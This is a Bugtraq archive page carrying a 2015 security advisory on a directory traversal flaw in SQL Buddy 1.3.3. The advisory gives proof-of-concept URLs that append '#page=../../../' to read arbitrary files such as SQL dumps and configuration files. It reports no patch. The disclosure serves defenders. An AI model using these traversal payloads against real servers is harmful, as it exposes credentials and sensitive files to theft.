[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability
From: apparitionsec@xxxxxxxxx
Date: Sat, 9 May 2015 04:39:55 GMT

Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability.

Vendor:
http://www.sqlbuddy.com

Release Date:
=============
05-08-2015

Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt


Product:
===============================
sqlbuddy version 1.3.3 SQL Buddy is an open source web based MySQL 
administration application.


Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about 
directories an read any PHP and non PHP files by appending
the '#' hash character when requesting files via URLs.

e.g. .doc, .txt, .xml, .conf, .sql etc...

After adding the '#' character as a delimiter any non PHP will be returned and 
rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>


POC exploit payloads:
=======================

1-Read from Apache restricted directory under htdocs:
  http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
  http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
  http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo


Disclosure Timeline:
==================================

Vendor Notification  N/A
May 8, 2015: Public Disclosure - hyp3rlinx


Exploitation Technique:
=======================
Create a test file with non .php extension in some htdocs directory then 
request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#


Severity Level:
===============
High


Description:
==========================


Request Method(s):
                                [+] POST

Vulnerable Product:
                                [+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
                                [+] #page=somefile

Affected Area(s):
                                [+] Server directories & sensitive files


Solution - Fix & Patch:
=======================
N/A


Credits: John Page ( hyp3rlinx )


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. the security research reporter John Page disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. apparitionsec or its suppliers are not 
liable in any case of damage, including direct, indirect, incidental, 
consequential loss of business profits or special damages.

Domains:  hyp3rlinx.altervista.org

Prev by Date: [security bulletin] HPSBGN03328 rev.1 - Network Virtualization for HP LoadRunner and Performance Center, Remote Information Disclosure
Next by Date: Sqlbuddy Path Traversal Vulnerability
Previous by thread: [security bulletin] HPSBGN03328 rev.1 - Network Virtualization for HP LoadRunner and Performance Center, Remote Information Disclosure
Next by thread: Sqlbuddy Path Traversal Vulnerability
Index(es):
- Date
- Thread